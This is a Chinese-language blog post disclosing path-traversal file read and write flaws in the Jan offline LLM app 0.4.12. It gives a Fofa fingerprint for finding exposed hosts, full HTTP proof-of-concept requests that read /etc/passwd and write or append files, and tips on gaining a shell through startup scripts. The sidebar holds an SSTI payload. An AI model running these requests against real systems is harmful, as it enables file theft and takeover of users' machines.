Jan任意文件读取/下载和上传漏洞

已于 2024-06-06 16:24:30 修改
阅读量497 收藏 10
点赞数 9
分类专栏: 渗透测试 文章标签: Jan AI LLM 漏洞 Jan漏洞 LLM攻击
于 2024-06-05 16:53:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32261191/article/details/139476157
版权

自从ChatGPT横空出世以来,我一直想找一个可以自己训练的AI大模型,然而在使用Jan的过程中,数据包中传递的参数引起了我的兴趣,简单尝试后发现了任意文件读取和任意文件上传漏洞。

简介

Jan是ChatGPT的开源替代品,它在您的计算机上100%离线运行。多引擎支持(llama.cpp、TensorRT LLM)。

项目地址

漏洞描述

Jan的API接口readFileSync未过滤参数,导致出现任意文件读取/下载漏洞。writeFileSyncappendFileSync未过滤参数,导致出现任意文件上载漏洞。

影响版本

  • 0.4.12 Latest

搜索语法

Fofa

  • icon_hash=“-165268926”

漏洞验证和复现

任意文件读取/下载

/v1/app/existsSync 可以通过路径穿越判断文件是否存在:


/v1/app/readFileSync 可以读取/下载任意文件:


也包括root权限的文件:

Poc

POST /v1/app/readFileSync HTTP/1.1
Host: {{Host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://<IP>:<Port>
contentType: application/json
Content-Type: text/plain;charset=UTF-8
Content-Length: 48
Origin: http://<IP>:<Port>
Connection: close

["file:/../../../../../../etc/passwd","utf-8"]

任意文件上传

创建任意文件并写入内容:

查看文件内容:

追加写入已存在的文件:


此外,您还可以利用此漏洞将计划任务和启动项写入getshell,如:/etc/init.d/目录,/etc/rc.d/目录,/etc/rc.local,~/.bash_profile,~/.bash_login~/.profile 文件来getshell。

Poc

使用writeFileSync接口

POST /v1/app/writeFileSync HTTP/1.1
Host: {{Host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://<IP>:<Port>
contentType: application/json
Content-Type: text/plain;charset=UTF-8
Content-Length: 35
Origin: http://<IP>:<Port>
Connection: close

["/../../../../../tmp/a.txt","abc"]

使用appendFileSync

POST /v1/app/appendFileSync HTTP/1.1
Host: {{Host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://<IP>:<Port>
contentType: application/json
Content-Type: text/plain;charset=UTF-8
Content-Length: 48
Origin: http://<IP>:<Port>
Connection: close

["file:/../../../../../../tmp/a.txt","bbb  ccc"]

由于这里是使用nodejs造成的风险,我也尝试上传nodejs模块结合调用getshell,但是没成功。

原文

Jan AFR/AFD vulnerability
Jan Arbitrary File Upload vulnerability

江左盟宗主
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JNPF修改通告】fastjson≤1.2.80反序列化漏洞
JNPF 专注低代码开发
05-27 339
近日Fastjson Develop Team 发现 fastjson 1.2.80及以下存在新的风险,存在反序列化漏洞攻击者可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大,请大家关注。 目前JNPF官方已完成修复,故在此建议诸位JNPF用户应尽快修复。 修复方案 航天筑梦科技兴国 微服务版 修改jnpf-java-cloud\pom.xml文件中的,fastjson.version 版本号‍‍ 单体版 修改jnpf-java-boot\pom.xml文件中的,fast
jnpf快速开发平台源码使用优缺点分析
2201_75897090的博客
12-16 436
JNPF.NET基于NET 6 技术框架封装的快速开发平台。包含多个开箱即用功能,具备RBAC功能、自动生成前后端代码、多种存储系统等等多个功能和模块,支持多业务系统并行开发, 支持多服务并行开发,平台设计灵活可扩展、可移植,可应用高并发需求,同时兼顾本地化、私有云、公有云部署,支持 SaaS 模式应用。核心技术采用 Net 6 为主要框架配有多个中间件看图1,前端基于 vue-element-admin 框架定制开发。为企业服务化中台整合、数字化中台转型提供强力支撑。.NET-Net6单体白皮书。
任意文件读取linux,Symphony < 1.4.20服务器任意文件读取漏洞
weixin_30475939的博客
04-30 106
发布日期:2012-11-26更新日期:2012-11-28受影响系统:Symphony Symphony < 1.4.20Symphony Symphony描述:--------------------------------------------------------------------------------BUGTRAQ ID: 56685CVE(CAN) ID: CVE-...
世邦通信 SPON IP网络对讲广播系统exportrecord.php 任意文件读取漏洞
Keepb1ue的博客
01-10 1855
世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
CTF 一些漏洞模式
qq_41996851的博客
05-10 884
SSTI模板注入 SSTI初探 SSTI 常用payload; {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
CTF文件包含篇 与 php文件包含
最新发布
2301_81556781的博客
07-13 688
phpMyAdmin是开源的MYSQL数据库管理工具 4.8.0~4.8.1index.php界面存在文件包含功能,代码分析进行绕过可实现漏洞利用。
负载均衡反向代理下的webshell上传+apache漏洞
weixin_53284312的博客
02-09 956
负载均衡下的webshell
nginx常见漏洞解析
qtttgeq的博客
04-06 1万+
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
CVE-2021-40116|CVE-2021-34783等——Cicso多个安全漏洞
LiBai'S BLOG
11-14 6784
漏洞复现漏洞概述影响版本漏洞复现漏洞详情处置建议 漏洞概述 2021年10月27日,Cisco发布安全公告,修复了Cisco Firepower 威胁防御 (FTD)、Cisco思科自适应安全设备 (ASA)和Firepower 管理中心 (FMC)中的多个安全漏洞。 CISCO ASA远程任意文件读取 Cisco Adaptive Security Appliance (ASA)是思科的一种防火墙设备。 Cisco Adaptive Security Appliance (ASA)防火墙设备以及Ci
2023年国家护网0day-poc/exp漏洞全汇总(目前已更新到91个..实时更新中...)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
08-21 3122
2023年国家护网目前收集到的0day和1day漏洞的poc或者exp大汇总,截止目前已更新到91个漏洞,本文会实时更新,有新的漏洞都会加上
手把手教你详细分析 Chrome 1day 漏洞 (CVE-2021-21224)
smellycat000的专栏
04-23 2839
聚焦源代码安全,网罗国内外最新资讯!本文共分五部分:一、时间线二、背景三、漏洞及补丁分析1、漏洞复现四、漏洞利用分析1、漏洞利用2、内存读写3、代码执行五、参考资料一、时间线2021年4...
模糊测试--强制性安全漏洞发掘
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
PHP漏洞全解
码无边
11-05 3310
PHP漏洞全解(一)-PHP网站的安全性问题 针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti
nginx常见漏洞解析_nginx漏洞
2401_83947255的博客
04-12 1171
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
Struts2 S2-062(CVE-2021-31805)漏洞分析及复现
江左盟的博客
04-20 3万+
简介 2022年4月12日,Apache发布安全公告,修复了一个Apache Struts2 中的远程代码执行漏洞S2-062(CVE-2021-31805),攻击者可以利用此漏洞来控制受影响的系统。该漏洞是由于 2020 年 S2-061(CVE-2020-17530)的不完整修复造成的,当开发人员使用了 %{…} 语法进行强制OGNL解析时,仍有一些特殊的TAG属性可被二次解析,攻击者可构造恶意的OGNL表达式触发漏洞,从而实现远程代码执行。 影响范围 2.0.0 <= Apache Struts
Kali linux渗透测试第一步:侦查
江左盟的博客
11-30 2万+
知己知彼,百战不殆 robots.txt:查看网站上哪些文件是不可以见的,Disallow:后面的就是不可见的 shodan搜索引擎:可以找出特定设备,如系统,运行着某个版本的软件 HTTrack:克隆网站的工具,在终端输入httrack,然后输入项目名,选择存储路径然后进行克隆 ICMP侦查技术:ping、traceroute和fping,traceroute会找出数据经过的...
SSR:DOCS Cz HK1 P/CHN/143810297/CHN/01jan10/fI/10dec10/LI/BABY/P1
03-28
SSR:DOCS是航空公司在机票预订系统中使用的一种特殊服务请求(Special Service Request)代码,用于提供旅客的相关信息。在你提供的SSR:DOCS Cz HK1 P/CHN/143810297/CHN/01jan10/fI/10dec10/LI/BABY/P1中,含义如下: - Cz:代表航空公司代码,这里指的是中国南方航空公司(China Southern Airlines)。 - HK1:代表预订确认,表示该请求已经被确认。 - P/CHN/143810297/CHN/01jan10/fI/10dec10/LI/BABY/P1:这是旅客的护照信息和出生日期等个人信息的编码。具体解读如下: - P:代表护照类型。 - CHN:代表国籍,这里指的是中国。 - 143810297:代表护照号码。 - CHN:代表签发国家,这里指的是中国。 - 01jan10:代表出生日期,这里是指出生于2010年1月1日。 - fI:代表性别,这里是指女性(female)。 - 10dec10:代表护照有效期,这里是指有效期至2010年12月10日。 - LI:代表旅客类型,这里是指婴儿(infant)。 - BABY:代表旅客姓名,这里是指婴儿的姓名。 - P1:代表旅客序号,这里是指第一个旅客。 希望以上解释对你有帮助!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值